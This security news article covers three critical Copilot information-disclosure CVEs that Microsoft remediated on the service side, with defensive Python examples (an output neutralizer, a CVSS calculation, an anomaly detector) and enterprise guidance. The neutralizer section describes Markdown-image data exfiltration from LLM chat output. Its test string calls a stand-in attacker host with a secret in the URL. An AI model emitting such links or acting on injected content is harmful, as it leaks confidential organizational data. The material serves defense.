Microsoft has disclosed three critical information-disclosure vulnerabilities in Microsoft 365 Copilot and Copilot Chat in Microsoft Edge, and has already remediated them on the service side. The flaws, CVE-2026-26129, CVE-2026-26164, and CVE-2026-33111, were published on May 7, 2026. Because Microsoft deployed the mitigations in its cloud services, no customer action or patch installation is required. While that immediate remediation reduces near-term risk, the underlying issues expose a broader tension: AI-powered productivity tools often surface large volumes of sensitive organizational data, and defects in how these services handle special elements or commands can allow confidential information to leak across trust boundaries.

Details of the vulnerabilities

CVE-2026-26129 affects Business Chat in Microsoft 365 Copilot and stems from improper neutralization of special elements in output used by a downstream component. Microsoft classified it as an information-disclosure issue and rated it critical, but did not publish full CVSS metrics with the advisory. The critical rating likely reflects the high confidentiality risk that follows from Copilot's broad access to enterprise data.

CVE-2026-26164 also affects Microsoft 365 Copilot and is categorized under CWE-74 (improper neutralization of special elements in output used by a downstream component, i.e., injection). The attack vector is network-based, and no privileges or user interaction are required. Microsoft's advisory rates exploitability as “Exploitation Less Likely” and lists exploit code maturity as unproven, but the potential confidentiality impact remains significant.
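Neither advisory describes the exact mechanism, so the following is only a generic illustration of the CWE-74 weakness class. It does not reconstruct either CVE. One well-documented pattern in LLM chat interfaces is model output that contains markup, such as a Markdown image, which a downstream renderer fetches automatically. Any data smuggled into the URL then leaves the tenant. The sketch below neutralizes such output before rendering. It drops Markdown image and link destinations that are not on an allow-list, then escapes HTML special characters. The function name `neutralize_for_renderer`, the `ALLOWED_HOSTS` set, and the example domains are hypothetical.

```python
import html
import re
from urllib.parse import urlparse

# Hypothetical allow-list: the only hosts a downstream renderer may fetch from.
ALLOWED_HOSTS = {"contoso.sharepoint.com"}

# Naive pattern for inline Markdown images ![alt](url) and links [text](url).
# Group 1 is "!" for images, group 2 the visible text, group 3 the URL.
MD_LINK = re.compile(r"(!?)\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def _host_allowed(url: str) -> bool:
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS


def neutralize_for_renderer(model_output: str) -> str:
    """Hypothetical filter applied to model output before a renderer sees it."""

    def replace(match: re.Match) -> str:
        bang, text, url = match.groups()
        if _host_allowed(url):
            return match.group(0)  # trusted destination: keep the link as-is
        # Untrusted destination: drop the URL so nothing is auto-fetched or clickable.
        return f"{text} [{'image' if bang else 'link'} removed]"

    defanged = MD_LINK.sub(replace, model_output)
    # Escape HTML special characters so raw tags render as text, not markup.
    return html.escape(defanged, quote=True)


print(neutralize_for_renderer("Q3 summary ![x](https://attacker.example/?d=secret) <img src=x>"))
# -> Q3 summary x [image removed] &lt;img src=x&gt;
```

The regex is deliberately simple and ignores reference-style links and nested brackets. A real filter would work on a parsed Markdown tree and enforce the same policy in the renderer's content security settings, not in a single string pass.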

CVE-2026-33111 affects Copilot Chat embedded in Microsoft Edge and is classified under CWE-77 (improper neutralization of special elements used in a command, i.e., command injection). Microsoft assigns it a CVSS base score of 7.5 (temporal score 6.5) and lists the same attack characteristics: network-accessible, no privileges required, no user interaction, and high confidentiality impact. Given Edge's broad enterprise deployment, this raises particular concern that an embedded Copilot instance could expose sensitive content accessible in the browser.
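The 7.5 figure is consistent with the attack characteristics listed above. The check below assumes the CVSS v3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. The attack complexity, scope, integrity, and availability values in that vector are assumptions, since only network access, no privileges, no user interaction, and high confidentiality impact are stated. Under that assumption, the v3.1 base-score equations reproduce 7.5. The 6.5 temporal score follows if one further assumes E:U/RL:O/RC:C (unproven exploit code, official fix, confirmed report). Those temporal values are also assumptions, not taken from the advisory.

```python
import math

# Metric weights from the CVSS v3.1 specification (scope-unchanged case only).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
E = {"X": 1.0, "H": 1.0, "F": 0.97, "P": 0.94, "U": 0.91}
RL = {"X": 1.0, "U": 1.0, "W": 0.97, "T": 0.96, "O": 0.95}
RC = {"X": 1.0, "C": 1.0, "R": 0.96, "U": 0.92}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value (spec Appendix A)."""
    int_input = round(value * 100_000)
    if int_input % 10_000 == 0:
        return int_input / 100_000.0
    return (math.floor(int_input / 10_000) + 1) / 10.0


def base_score(av: str, ac: str, pr: str, ui: str, c: str, i: str, a: str) -> float:
    """Base score for a scope-unchanged (S:U) vector."""
    iss = 1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[av] * AC[ac] * PR_UNCHANGED[pr] * UI[ui]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


def temporal_score(base: float, e: str, rl: str, rc: str) -> float:
    return roundup(base * E[e] * RL[rl] * RC[rc])


# Assumed vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, temporal E:U/RL:O/RC:C
base = base_score("N", "L", "N", "N", "H", "N", "N")
print(base, temporal_score(base, "U", "O", "C"))  # 7.5 6.5
```

The arithmetic shows why a read-only flaw can still score high. Impact comes only from confidentiality (6.42 × 0.56 ≈ 3.60). The remote, unauthenticated, no-interaction exploitability term adds about 3.89, for a total of about 7.48, which rounds up to 7.5.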

Why this matters for enterprises

AI assistants like Copilot aggregate emails, documents, chat logs, calendar entries, and other corporate artifacts to provide contextual responses. That centralized access creates a concentrated attack surface: a single flaw in how outputs or embedded commands are handled can turn a productivity feature into an information-disclosure vector. Potential impacts include exposure of intellectual property, confidential communications, restricted internal records, or personally identifiable information. Even if exploitability is assessed as low today, the sensitivity and volume of data accessible by Copilot mean any successful exploit could yield outsized damage.

Microsoft’s response and the disclosure timeline

Microsoft’s Security Response Center published advisories crediting internal and external researchers (Estevam Arantes and independent researcher 0xSombra) for two of the discoveries. Importantly, Microsoft states that none of the three vulnerabilities were publicly disclosed or observed in active exploitation prior to publication. Because these were cloud-side issues, Microsoft deployed mitigations at the service layer, eliminating the need for patches or configuration changes by customers. This approach aligns with Microsoft’s transparency program for cloud-service CVEs but also underscores that cloud-side fixes are only one line of defense; organizations must still manage access and data exposure to reduce downstream risk.

Practical guidance for security teams

- Review Copilot and Copilot Chat data access permissions: Treat service permissions like any other identity or integration. Enforce least-privilege access so the assistant can only reach the data necessary for its function.

- Audit data sources and connectors: Inventory what mailboxes, SharePoint sites, Teams channels, and document repositories Copilot can access. Close or segregate access to high-risk repositories where feasible.

- Apply data classification and policy controls: Ensure sensitive labels, DLP policies, and retention rules apply consistently across sources that Copilot indexes or reads from. Where possible, block the assistant from reading highly sensitive content.

- Monitor logs and anomalous queries: Establish alerts for unusual Copilot queries, mass data exfiltration patterns, or unexpected downstream requests that suggest abuse of the assistant’s access scope.

- Use network and browser controls for embedded clients: For scenarios where Copilot is embedded in browsers like Edge, apply browser isolation, extension controls, and segmentation to limit lateral exposure from a compromised client context.

- Vendor and supply-chain vigilance: Treat cloud providers’ service-side mitigations as necessary but not sufficient. Maintain communication channels with vendors for transparency and validate their remediation steps against your risk model.

- Prepare incident response playbooks: Include AI-assistant–specific scenarios in tabletop exercises. Define containment actions (e.g., revoking service tokens, narrowing access, or temporarily disabling integrations) that can be executed quickly if a new flaw is discovered.
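As a starting point for the monitoring recommendation, the sketch below flags users whose Copilot interaction count in a time window is far above the typical user's. It assumes interaction events have already been exported from whatever audit source the organization uses into simple (user, timestamp) records. The `CopilotEvent` record shape, the `flag_anomalous_users` name, the one-hour window, and the 5× median and 20-event thresholds are all hypothetical choices, not a Microsoft log schema or recommended values.

```python
from collections import Counter
from datetime import datetime, timedelta
from statistics import median
from typing import Iterable, NamedTuple


class CopilotEvent(NamedTuple):
    """Hypothetical normalized audit record: who queried the assistant, and when."""
    user: str
    timestamp: datetime


def flag_anomalous_users(
    events: Iterable[CopilotEvent],
    window_end: datetime,
    window: timedelta = timedelta(hours=1),
    multiplier: float = 5.0,
    min_count: int = 20,
) -> list[str]:
    """Return users whose query count in [window_end - window, window_end)
    exceeds both multiplier x the median active user's count and min_count."""
    window_start = window_end - window
    counts = Counter(e.user for e in events if window_start <= e.timestamp < window_end)
    if not counts:
        return []
    threshold = max(multiplier * median(counts.values()), min_count)
    return sorted(user for user, n in counts.items() if n > threshold)


# Example: three users with light usage and one issuing a burst of queries.
now = datetime(2026, 5, 7, 12, 0)
events = [CopilotEvent(u, now - timedelta(minutes=10)) for u in ("alice", "bob", "carol") for _ in range(3)]
events += [CopilotEvent("mallory", now - timedelta(minutes=5)) for _ in range(50)]
print(flag_anomalous_users(events, now))  # ['mallory']
```

The median is taken only over users who were active in the window, so in a quiet tenant the `min_count` floor does most of the work. A production detector would more likely compare each user against their own historical baseline and also weigh what was accessed, not just how often.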

Balancing innovation and risk

AI-driven assistants are powerful productivity multipliers, but their benefits come with distinct operational risks. The Copilot vulnerabilities show that traditional software security concerns, such as input sanitization, output neutralization, and command injection, remain central in AI contexts, and that mistakes can expose disproportionately sensitive data. Organizations have to rely on providers to fix cloud-side issues like these, but they can still continuously reduce the blast radius through careful permissioning, data governance, and layered monitoring.

Final thoughts

Microsoft's service-side mitigation of these three Copilot vulnerabilities is reassuring, but it should prompt organizations to reassess how much trust and access they grant to AI assistants. Adopting a least-privilege posture, enforcing strong data classification and DLP policies, and preparing detection and response plans tailored to AI integrations will reduce exposure from future flaws. As enterprise AI becomes more embedded in daily workflows, security teams must evolve their controls to match the elevated sensitivity of the data these tools can reach.

Hackers Leverage Microsoft Teams to Breach Organizations: Inside UNC6692’s SNOW Campaign

In late 2025 and into early 2026, a sophisticated intrusion campaign used…



New RDP Alert After April 2026 Security Update Warns of Unknown Connections

Microsoft’s April 2026 Patch Tuesday introduced a small-looking but important change to…

Recently Leaked Windows Zero-Days Now Being Actively Exploited: What You Need to Know

Threat actors have begun abusing three recently disclosed Windows vulnerabilities to escalate…

RedSun: New Microsoft Defender Zero-Day Lets Unprivileged Users Gain SYSTEM Access

A freshly disclosed zero-day vulnerability in Microsoft Defender, dubbed "RedSun," has raised…